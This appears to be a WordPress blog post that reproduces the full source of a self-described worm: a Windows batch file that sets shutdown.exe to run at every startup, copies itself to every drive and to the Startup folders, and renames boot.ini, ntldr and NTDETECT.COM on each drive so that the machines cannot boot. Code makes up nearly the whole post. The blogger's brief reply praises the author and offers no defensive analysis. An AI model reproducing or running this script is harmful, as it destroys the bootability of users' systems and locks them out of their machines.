Anatomy of an worm written with plain windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi… Check the source code…..
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you’ve found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm.
Antiviruses detect it as those test in heuristic mode…
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s